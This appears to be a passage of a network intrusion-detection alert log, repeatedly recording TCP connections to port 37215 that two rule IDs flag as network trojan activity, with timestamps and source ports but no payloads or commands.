          Timestamp:06/08/24-15:05:50.742013
          SID:2829579
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798606
          SID:2829579
          Source Port:45684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238444
          SID:2829579
          Source Port:42728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551778
          SID:2829579
          Source Port:40828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175527
          SID:2835222
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843657
          SID:2829579
          Source Port:41168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153595
          SID:2829579
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460848
          SID:2829579
          Source Port:44074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159637
          SID:2835222
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107133
          SID:2835222
          Source Port:39718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599304
          SID:2829579
          Source Port:59790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.183447
          SID:2829579
          Source Port:39460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745284
          SID:2829579
          Source Port:41328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019781
          SID:2835222
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861397
          SID:2835222
          Source Port:36702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159038
          SID:2835222
          Source Port:36134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672914
          SID:2835222
          Source Port:59370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600058
          SID:2835222
          Source Port:45916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238451
          SID:2829579
          Source Port:40016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440787
          SID:2835222
          Source Port:50068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264478
          SID:2835222
          Source Port:48238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153628
          SID:2835222
          Source Port:45374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810503
          SID:2835222
          Source Port:38626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707844
          SID:2829579
          Source Port:42094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599706
          SID:2829579
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350958
          SID:2835222
          Source Port:37650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800597
          SID:2835222
          Source Port:44336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016457
          SID:2829579
          Source Port:34014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734795
          SID:2829579
          Source Port:58258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107437
          SID:2835222
          Source Port:44904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601599
          SID:2829579
          Source Port:35530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267764
          SID:2829579
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131245
          SID:2829579
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042054
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067679
          SID:2835222
          Source Port:59708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788280
          SID:2829579
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891555
          SID:2829579
          Source Port:46078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175274
          SID:2829579
          Source Port:56608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789575
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132933
          SID:2835222
          Source Port:46402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461725
          SID:2835222
          Source Port:33944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469580
          SID:2829579
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352848
          SID:2835222
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131143
          SID:2829579
          Source Port:39974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243534
          SID:2829579
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157942
          SID:2829579
          Source Port:51802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355435
          SID:2829579
          Source Port:34890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110165
          SID:2835222
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017755
          SID:2835222
          Source Port:54574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087292
          SID:2829579
          Source Port:56260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448602
          SID:2829579
          Source Port:36166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273569
          SID:2835222
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407786
          SID:2835222
          Source Port:44952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461656
          SID:2829579
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511335
          SID:2835222
          Source Port:54598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740846
          SID:2835222
          Source Port:47874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188912
          SID:2829579
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549392
          SID:2835222
          Source Port:46248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274604
          SID:2829579
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742167
          SID:2835222
          Source Port:54658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912012
          SID:2835222
          Source Port:60362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154071
          SID:2835222
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465574
          SID:2829579
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273270
          SID:2835222
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179446
          SID:2835222
          Source Port:37522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270922
          SID:2829579
          Source Port:54584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704628
          SID:2835222
          Source Port:44964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173515
          SID:2835222
          Source Port:39588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401820
          SID:2835222
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107292
          SID:2835222
          Source Port:60074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817340
          SID:2829579
          Source Port:51498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667527
          SID:2829579
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887318
          SID:2835222
          Source Port:43770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446333
          SID:2829579
          Source Port:58606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817155
          SID:2835222
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792219
          SID:2829579
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353193
          SID:2829579
          Source Port:49432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517012
          SID:2829579
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466427
          SID:2829579
          Source Port:41908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259860
          SID:2835222
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471275
          SID:2835222
          Source Port:46554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174787
          SID:2829579
          Source Port:37286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174285
          SID:2835222
          Source Port:37652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461638
          SID:2829579
          Source Port:36402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787678
          SID:2835222
          Source Port:41336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819046
          SID:2829579
          Source Port:56222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742197
          SID:2829579
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743103
          SID:2829579
          Source Port:59120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265882
          SID:2835222
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792016
          SID:2829579
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041338
          SID:2835222
          Source Port:39040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353844
          SID:2829579
          Source Port:37904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468664
          SID:2835222
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179720
          SID:2835222
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805061
          SID:2829579
          Source Port:39260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407265
          SID:2835222
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801154
          SID:2829579
          Source Port:47880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744940
          SID:2829579
          Source Port:56650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495986
          SID:2829579
          Source Port:48308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177577
          SID:2835222
          Source Port:52566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672323
          SID:2835222
          Source Port:58302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460937
          SID:2829579
          Source Port:57576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816808
          SID:2835222
          Source Port:49084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396105
          SID:2829579
          Source Port:39764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782120
          SID:2835222
          Source Port:58856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.803326
          SID:2835222
          Source Port:53864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551811
          SID:2835222
          Source Port:47528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350821
          SID:2829579
          Source Port:46472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078469
          SID:2835222
          Source Port:33198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894528
          SID:2835222
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174882
          SID:2835222
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115478
          SID:2835222
          Source Port:56870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550014
          SID:2835222
          Source Port:44002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148512
          SID:2835222
          Source Port:56018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599687
          SID:2829579
          Source Port:48838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114241
          SID:2835222
          Source Port:36764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266393
          SID:2835222
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108200
          SID:2835222
          Source Port:57584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787910
          SID:2835222
          Source Port:37180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067368
          SID:2835222
          Source Port:41000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466180
          SID:2835222
          Source Port:44322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887739
          SID:2829579
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178031
          SID:2829579
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705822
          SID:2835222
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264573
          SID:2835222
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037330
          SID:2829579
          Source Port:41888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116534
          SID:2829579
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468634
          SID:2835222
          Source Port:60690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127425
          SID:2829579
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157546
          SID:2835222
          Source Port:40676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176230
          SID:2835222
          Source Port:44646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808195
          SID:2829579
          Source Port:38656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780814
          SID:2835222
          Source Port:39584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019944
          SID:2829579
          Source Port:57124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829395
          SID:2835222
          Source Port:58994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792006
          SID:2829579
          Source Port:44306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547861
          SID:2835222
          Source Port:53744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177040
          SID:2829579
          Source Port:54768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822360
          SID:2835222
          Source Port:44470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353385
          SID:2835222
          Source Port:50924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894612
          SID:2829579
          Source Port:38092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160275
          SID:2829579
          Source Port:50316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512323
          SID:2835222
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274148
          SID:2835222
          Source Port:54432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549703
          SID:2829579
          Source Port:39616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179697
          SID:2835222
          Source Port:36664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550873
          SID:2829579
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783008
          SID:2835222
          Source Port:56548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409434
          SID:2829579
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085402
          SID:2829579
          Source Port:43096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.595130
          SID:2829579
          Source Port:50230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780717
          SID:2835222
          Source Port:52948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109355
          SID:2835222
          Source Port:33278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463458
          SID:2829579
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673643
          SID:2835222
          Source Port:47124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169454
          SID:2829579
          Source Port:49388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782784
          SID:2835222
          Source Port:34292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132981
          SID:2835222
          Source Port:57986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670527
          SID:2835222
          Source Port:47842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604546
          SID:2835222
          Source Port:33554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127531
          SID:2829579
          Source Port:59548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238546
          SID:2829579
          Source Port:37376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352671
          SID:2835222
          Source Port:49152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516723
          SID:2835222
          Source Port:58542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782499
          SID:2835222
          Source Port:41452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242879
          SID:2835222
          Source Port:42620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242909
          SID:2835222
          Source Port:41230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513964
          SID:2835222
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897366
          SID:2829579
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891440
          SID:2835222
          Source Port:49688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708926
          SID:2829579
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912161
          SID:2835222
          Source Port:60682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394382
          SID:2835222
          Source Port:50052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857616
          SID:2835222
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132332
          SID:2835222
          Source Port:55090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241180
          SID:2829579
          Source Port:43108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378013
          SID:2835222
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517541
          SID:2829579
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043643
          SID:2835222
          Source Port:49444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675101
          SID:2829579
          Source Port:35684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708053
          SID:2835222
          Source Port:45912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603132
          SID:2835222
          Source Port:34396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893378
          SID:2835222
          Source Port:43634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732219
          SID:2835222
          Source Port:57110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896083
          SID:2829579
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709231
          SID:2835222
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040389
          SID:2829579
          Source Port:37816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673475
          SID:2835222
          Source Port:43236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264773
          SID:2835222
          Source Port:45286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410698
          SID:2835222
          Source Port:43962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107952
          SID:2835222
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017563
          SID:2835222
          Source Port:36270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731599
          SID:2829579
          Source Port:45754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306672
          SID:2829579
          Source Port:50904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706269
          SID:2829579
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603115
          SID:2829579
          Source Port:46266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184223
          SID:2835222
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273198
